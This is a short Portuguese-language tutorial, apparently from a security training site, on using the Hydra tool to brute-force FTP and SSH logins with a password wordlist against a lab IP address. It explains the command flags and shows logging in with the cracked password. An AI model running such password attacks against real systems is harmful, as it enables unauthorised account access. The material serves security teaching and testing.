O Hydra é uma excelente ferramenta para realização ataques de senhas, os ataques podem ser realizados através de uma lista de palavras "wordlist" contendo uma grande quantidade de usuários e senhas.

Site: www.thc.org/thc-hydra

Veja alguns exemplos básicos de como utilizar o Hydra:

WordList

Crie o arquivo senhas.txt contendo senhas aleatórias que possivelmente possa pertencer a um determinado usuário.

Linux
cat senhas.txt

Ataque ao Servidor FTP

01 - Passo

Execute o comando:

Linux
hydra -l 100security -P senhas.txt 10.10.10.123 ftp

-l : Define o login do usuário.
100security : Login do usuário a ser verificado.
-P : Define o arquivo contendo as possíveis senhas "wordlist".
senhas.txt : Arquivo que contém as possíveis senhas do usuário informado.
10.10.10.123 : IP do servidor FTP.
ftp : Tipo do serviço a ser verificado.

Ao realizar o ataque a senha do usuário informado é revelada caso esta esteja no arquivo senhas.txt.

Login: 100security
Password: [email protected]

02 - Passo

Para validar os acessos estabeleça a conexão como serviço FTP :

Linux
ftp 10.10.10.123

Ataque ao Servidor SSH

01 - Passo

Execute o comando:

Linux
hydra -l 100security -P senhas.txt 10.10.10.123 ssh

02 - Passo

Para validar os acessos estabeleça a conexão como serviço SSH :

Linux
ssh -l 100security 10.10.10.123


  Autor

Marcos Henrique

 São Paulo/SP



  Ataques de Senhas

© 2020 - 100SECURITY

Contato